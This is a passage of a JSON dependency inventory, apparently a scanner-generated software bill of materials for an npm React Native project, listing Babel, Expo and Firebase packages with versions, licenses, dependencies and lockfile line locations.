"@babel/core@7.28.4", "@babel/helper-create-class-features-plugin@7.28.3", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1597, "EndLine": 1612 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-private-property-in-object@7.27.1", "Name": "@babel/plugin-transform-private-property-in-object", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-private-property-in-object@7.27.1", "UID": "ce17c0cab465756b" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-create-class-features-plugin@7.28.3", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1613, "EndLine": 1629 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-react-display-name@7.28.0", "Name": "@babel/plugin-transform-react-display-name", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-react-display-name@7.28.0", "UID": "1baba8764cd154e" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1646, "EndLine": 1660 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-react-jsx@7.27.1", "Name": "@babel/plugin-transform-react-jsx", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-react-jsx@7.27.1", "UID": "1bc556b0f42b262f" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-module-imports@7.27.1", "@babel/helper-plugin-utils@7.27.1", "@babel/plugin-syntax-jsx@7.27.1", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 1661, "EndLine": 1679 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-react-jsx-self@7.27.1", "Name": "@babel/plugin-transform-react-jsx-self", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-react-jsx-self@7.27.1", "UID": "3b73f9c9a586a855" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1680, "EndLine": 1694 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-react-jsx-source@7.27.1", "Name": "@babel/plugin-transform-react-jsx-source", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-react-jsx-source@7.27.1", "UID": "c7248e2460d47258" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1695, "EndLine": 1709 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-regenerator@7.28.4", "Name": "@babel/plugin-transform-regenerator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-regenerator@7.28.4", "UID": "e3e8442ca1a771d8" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1710, "EndLine": 1724 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-runtime@7.28.3", "Name": "@babel/plugin-transform-runtime", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-runtime@7.28.3", "UID": "5b72a8759ded0408" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-module-imports@7.27.1", "@babel/helper-plugin-utils@7.27.1", "babel-plugin-polyfill-corejs2@0.4.14", "babel-plugin-polyfill-corejs3@0.13.0", "babel-plugin-polyfill-regenerator@0.6.5", "semver@6.3.1" ], "Locations": [ { "StartLine": 1758, "EndLine": 1777 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-shorthand-properties@7.27.1", "Name": "@babel/plugin-transform-shorthand-properties", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-shorthand-properties@7.27.1", "UID": "7be3dcac36e59eb" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1778, "EndLine": 1792 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-spread@7.27.1", "Name": "@babel/plugin-transform-spread", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-spread@7.27.1", "UID": "e8c79648231670e5" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1" ], "Locations": [ { "StartLine": 1793, "EndLine": 1808 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-sticky-regex@7.27.1", "Name": "@babel/plugin-transform-sticky-regex", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-sticky-regex@7.27.1", "UID": "e1ae39053caf733d" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1809, "EndLine": 1823 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-template-literals@7.27.1", "Name": "@babel/plugin-transform-template-literals", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-template-literals@7.27.1", "UID": "7649891d5c191bfe" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1824, "EndLine": 1838 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-typescript@7.28.0", "Name": "@babel/plugin-transform-typescript", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-typescript@7.28.0", "UID": "cc12ae363c6e34aa" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-create-class-features-plugin@7.28.3", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1", "@babel/plugin-syntax-typescript@7.27.1" ], "Locations": [ { "StartLine": 1855, "EndLine": 1873 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/plugin-transform-unicode-regex@7.27.1", "Name": "@babel/plugin-transform-unicode-regex", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-unicode-regex@7.27.1", "UID": "39fe052f6a3f505f" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-create-regexp-features-plugin@7.27.1", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 1907, "EndLine": 1922 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/preset-typescript@7.27.1", "Name": "@babel/preset-typescript", "Identifier": { "PURL": "pkg:npm/%40babel/preset-typescript@7.27.1", "UID": "263819b530d361e9" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-validator-option@7.27.1", "@babel/plugin-syntax-jsx@7.27.1", "@babel/plugin-transform-modules-commonjs@7.27.1", "@babel/plugin-transform-typescript@7.28.0" ], "Locations": [ { "StartLine": 2040, "EndLine": 2058 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/template@7.27.2", "Name": "@babel/template", "Identifier": { "PURL": "pkg:npm/%40babel/template@7.27.2", "UID": "81c2a891b06d272e" }, "Version": "7.27.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/parser@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 2068, "EndLine": 2081 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/traverse@7.28.4", "Name": "@babel/traverse", "Identifier": { "PURL": "pkg:npm/%40babel/traverse@7.28.4", "UID": "400d8c03bc57c98b" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/generator@7.28.3", "@babel/helper-globals@7.28.0", "@babel/parser@7.28.4", "@babel/template@7.27.2", "@babel/types@7.28.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 2082, "EndLine": 2099 }, { "StartLine": 2100, "EndLine": 2118 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/types@7.28.4", "Name": "@babel/types", "Identifier": { "PURL": "pkg:npm/%40babel/types@7.28.4", "UID": "a98ce057aa2f88cf" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-string-parser@7.27.1", "@babel/helper-validator-identifier@7.27.1" ], "Locations": [ { "StartLine": 2119, "EndLine": 2131 } ], "AnalyzedBy": "npm" }, { "ID": "@callstack/react-theme-provider@3.0.9", "Name": "@callstack/react-theme-provider", "Identifier": { "PURL": "pkg:npm/%40callstack/react-theme-provider@3.0.9", "UID": "7ed581511605e761" }, "Version": "3.0.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "deepmerge@3.3.0", "hoist-non-react-statics@3.3.2", "react@19.1.0" ], "Locations": [ { "StartLine": 2139, "EndLine": 2151 } ], "AnalyzedBy": "npm" }, { "ID": "@craftzdog/react-native-buffer@6.1.1", "Name": "@craftzdog/react-native-buffer", "Identifier": { "PURL": "pkg:npm/%40craftzdog/react-native-buffer@6.1.1", "UID": "952be585b112c9d" }, "Version": "6.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ieee754@1.2.1", "react-native-quick-base64@2.2.2" ], "Locations": [ { "StartLine": 2161, "EndLine": 2184 } ], "AnalyzedBy": "npm" }, { "ID": "@egjs/hammerjs@2.0.17", "Name": "@egjs/hammerjs", "Identifier": { "PURL": "pkg:npm/%40egjs/hammerjs@2.0.17", "UID": "8da3564581409f49" }, "Version": "2.0.17", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/hammerjs@2.0.46" ], "Locations": [ { "StartLine": 2195, "EndLine": 2206 } ], "AnalyzedBy": "npm" }, { "ID": "@expo/config-plugins@10.1.2", "Name": "@expo/config-plugins", "Identifier": { "PURL": "pkg:npm/%40expo/config-plugins@10.1.2", "UID": "b4b1c72b0008b762" }, "Version": "10.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@expo/config-types@53.0.5", "@expo/json-file@9.1.5", "@expo/plist@0.3.5", "@expo/sdk-runtime-versions@1.0.0", "chalk@4.1.2", "debug@4.4.3", "getenv@2.0.0", "glob@10.4.5", "resolve-from@5.0.0", "semver@7.7.3", "slash@3.0.0", "slugify@1.6.6", "xcode@3.0.1", "xml2js@0.6.0" ], "Locations": [ { "StartLine": 2307, "EndLine": 2328 } ], "AnalyzedBy": "npm" }, { "ID": "@expo/config-types@53.0.5", "Name": "@expo/config-types", "Identifier": { "PURL": "pkg:npm/%40expo/config-types@53.0.5", "UID": "525fccba8d91f264" }, "Version": "53.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2370, "EndLine": 2375 } ], "AnalyzedBy": "npm" }, { "ID": "@expo/json-file@9.1.5", "Name": "@expo/json-file", "Identifier": { "PURL": "pkg:npm/%40expo/json-file@9.1.5", "UID": "12e257308098e77f" }, "Version": "9.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.10.4", "json5@2.2.3" ], "Locations": [ { "StartLine": 2376, "EndLine": 2385 } ], "AnalyzedBy": "npm" }, { "ID": "@expo/plist@0.3.5", "Name": "@expo/plist", "Identifier": { "PURL": "pkg:npm/%40expo/plist@0.3.5", "UID": "d9acffe9664f9003" }, "Version": "0.3.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@xmldom/xmldom@0.8.11", "base64-js@1.5.1", "xmlbuilder@15.1.1" ], "Locations": [ { "StartLine": 2395, "EndLine": 2405 } ], "AnalyzedBy": "npm" }, { "ID": "@expo/sdk-runtime-versions@1.0.0", "Name": "@expo/sdk-runtime-versions", "Identifier": { "PURL": "pkg:npm/%40expo/sdk-runtime-versions@1.0.0", "UID": "3393e524bba94941" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2406, "EndLine": 2411 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/ai@2.2.1", "Name": "@firebase/ai", "Identifier": { "PURL": "pkg:npm/%40firebase/ai@2.2.1", "UID": "236918d0f6811e9c" }, "Version": "2.2.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.3", "@firebase/app-types@0.9.3", "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2412, "EndLine": 2431 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/analytics@0.10.18", "Name": "@firebase/analytics", "Identifier": { "PURL": "pkg:npm/%40firebase/analytics@0.10.18", "UID": "329808fa1311b76d" }, "Version": "0.10.18", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2438, "EndLine": 2453 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/analytics-compat@0.2.24", "Name": "@firebase/analytics-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/analytics-compat@0.2.24", "UID": "62d0873dd6cba61a" }, "Version": "0.2.24", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/analytics-types@0.8.3", "@firebase/analytics@0.10.18", "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2454, "EndLine": 2469 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/analytics-types@0.8.3", "Name": "@firebase/analytics-types", "Identifier": { "PURL": "pkg:npm/%40firebase/analytics-types@0.8.3", "UID": "9acd93cfb92624c" }, "Version": "0.8.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2476, "EndLine": 2481 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app@0.14.2", "Name": "@firebase/app", "Identifier": { "PURL": "pkg:npm/%40firebase/app@0.14.2", "UID": "b374661166fc2974" }, "Version": "0.14.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "idb@7.1.1", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2488, "EndLine": 2503 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-check@0.11.0", "Name": "@firebase/app-check", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check@0.11.0", "UID": "7fce5d28eb91edfd" }, "Version": "0.11.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2504, "EndLine": 2521 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-check-compat@0.4.0", "Name": "@firebase/app-check-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-compat@0.4.0", "UID": "750143c3137c3a0b" }, "Version": "0.4.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-types@0.5.3", "@firebase/app-check@0.11.0", "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2522, "EndLine": 2541 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-check-interop-types@0.3.3", "Name": "@firebase/app-check-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-interop-types@0.3.3", "UID": "8b66c65b56b052ce" }, "Version": "0.3.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2548, "EndLine": 2553 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-check-types@0.5.3", "Name": "@firebase/app-check-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-types@0.5.3", "UID": "fe0202c0da0554f1" }, "Version": "0.5.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2554, "EndLine": 2559 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-compat@0.5.2", "Name": "@firebase/app-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/app-compat@0.5.2", "UID": "5c86d0dd51218021" }, "Version": "0.5.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2566, "EndLine": 2581 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-types@0.9.3", "Name": "@firebase/app-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-types@0.9.3", "UID": "4b18d07362b45a02" }, "Version": "0.9.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2588, "EndLine": 2593 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/auth@1.11.0", "Name": "@firebase/auth", "Identifier": { "PURL": "pkg:npm/%40firebase/auth@1.11.0", "UID": "763b6929ff578f6b" }, "Version": "1.11.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "@react-native-async-storage/async-storage@1.24.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2600, "EndLine": 2623 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/auth-compat@0.6.0", "Name": "@firebase/auth-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-compat@0.6.0", "UID": "d768692825181e7e" }, "Version": "0.6.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/auth-types@0.13.0", "@firebase/auth@1.11.0", "@firebase/component@0.7.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2624, "EndLine": 2642 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/auth-interop-types@0.2.4", "Name": "@firebase/auth-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-interop-types@0.2.4", "UID": "8566cf44cee9df15" }, "Version": "0.2.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2649, "EndLine": 2654 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/auth-types@0.13.0", "Name": "@firebase/auth-types", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-types@0.13.0", "UID": "c28eaba81f4962a3" }, "Version": "0.13.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.3", "@firebase/util@1.13.0" ], "Locations": [ { "StartLine": 2655, "EndLine": 2664 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/component@0.7.0", "Name": "@firebase/component", "Identifier": { "PURL": "pkg:npm/%40firebase/component@0.7.0", "UID": "d3413c4e531a76d2" }, "Version": "0.7.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2671, "EndLine": 2683 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/data-connect@0.3.11", "Name": "@firebase/data-connect", "Identifier": { "PURL": "pkg:npm/%40firebase/data-connect@0.3.11", "UID": "5f1ab1e1e8adcafe" }, "Version": "0.3.11", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/auth-interop-types@0.2.4", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2690, "EndLine": 2705 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database@1.1.0", "Name": "@firebase/database", "Identifier": { "PURL": "pkg:npm/%40firebase/database@1.1.0", "UID": "3c171ddc1d65f9cc" }, "Version": "1.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.3", "@firebase/auth-interop-types@0.2.4", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "faye-websocket@0.11.4", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2712, "EndLine": 2729 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database-compat@2.1.0", "Name": "@firebase/database-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/database-compat@2.1.0", "UID": "616db2e3a065c6cf" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/database-types@1.0.16", "@firebase/database@1.1.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2730, "EndLine": 2746 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database-types@1.0.16", "Name": "@firebase/database-types", "Identifier": { "PURL": "pkg:npm/%40firebase/database-types@1.0.16", "UID": "89ea169e13cf85ec" }, "Version": "1.0.16", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.3", "@firebase/util@1.13.0" ], "Locations": [ { "StartLine": 2753, "EndLine": 2762 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/firestore@4.9.1", "Name": "@firebase/firestore", "Identifier": { "PURL": "pkg:npm/%40firebase/firestore@4.9.1", "UID": "c9e252d5fe4f57d6" }, "Version": "4.9.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "@firebase/webchannel-wrapper@1.0.4", "@grpc/grpc-js@1.9.15", "@grpc/proto-loader@0.7.15", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2769, "EndLine": 2789 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/firestore-compat@0.4.1", "Name": "@firebase/firestore-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/firestore-compat@0.4.1", "UID": "9bea3f707d961720" }, "Version": "0.4.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/firestore-types@3.0.3", "@firebase/firestore@4.9.1", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2790, "EndLine": 2808 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/firestore-types@3.0.3", "Name": "@firebase/firestore-types", "Identifier": { "PURL": "pkg:npm/%40firebase/firestore-types@3.0.3", "UID": "80a9cdf15fe6c08a" }, "Version": "3.0.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.3", "@firebase/util@1.13.0" ], "Locations": [ { "StartLine": 2815, "EndLine": 2824 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/functions@0.13.1", "Name": "@firebase/functions", "Identifier": { "PURL": "pkg:npm/%40firebase/functions@0.13.1", "UID": "972963dfd8833615" }, "Version": "0.13.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.3", "@firebase/app@0.14.2", "@firebase/auth-interop-types@0.2.4", "@firebase/component@0.7.0", "@firebase/messaging-interop-types@0.2.3", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2831, "EndLine": 2850 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/functions-compat@0.4.1", "Name": "@firebase/functions-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/functions-compat@0.4.1", "UID": "efaa47feecfd80f0" }, "Version": "0.4.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/functions-types@0.6.3", "@firebase/functions@0.13.1", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2851, "EndLine": 2869 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/functions-types@0.6.3", "Name": "@firebase/functions-types", "Identifier": { "PURL": "pkg:npm/%40firebase/functions-types@0.6.3", "UID": "245e59a14b88e3fb" }, "Version": "0.6.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2876, "EndLine": 2881 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/installations@0.6.19", "Name": "@firebase/installations", "Identifier": { "PURL": "pkg:npm/%40firebase/installations@0.6.19", "UID": "7e4e9b32ee61208c" }, "Version": "0.6.19", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/util@1.13.0", "idb@7.1.1", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2888, "EndLine": 2902 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/installations-compat@0.2.19", "Name": "@firebase/installations-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/installations-compat@0.2.19", "UID": "a6df8e5f7e1b6c2" }, "Version": "0.2.19", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/installations-types@0.5.3", "@firebase/installations@0.6.19", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2903, "EndLine": 2918 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/installations-types@0.5.3", "Name": "@firebase/installations-types", "Identifier": { "PURL": "pkg:npm/%40firebase/installations-types@0.5.3", "UID": "25dff3fa4d6d55b5" }, "Version": "0.5.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.3" ], "Locations": [ { "StartLine": 2925, "EndLine": 2933 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/logger@0.5.0", "Name": "@firebase/logger", "Identifier": { "PURL": "pkg:npm/%40firebase/logger@0.5.0", "UID": "6ce41b2e88446fc6" }, "Version": "0.5.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 2940, "EndLine": 2951 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/messaging@0.12.23", "Name": "@firebase/messaging", "Identifier": { "PURL": "pkg:npm/%40firebase/messaging@0.12.23", "UID": "84e92c96e2abe5ed" }, "Version": "0.12.23", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/messaging-interop-types@0.2.3", "@firebase/util@1.13.0", "idb@7.1.1", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2958, "EndLine": 2974 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/messaging-compat@0.2.23", "Name": "@firebase/messaging-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/messaging-compat@0.2.23", "UID": "836d15cc3753579b" }, "Version": "0.2.23", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/messaging@0.12.23", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 2975, "EndLine": 2989 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/messaging-interop-types@0.2.3", "Name": "@firebase/messaging-interop-types", 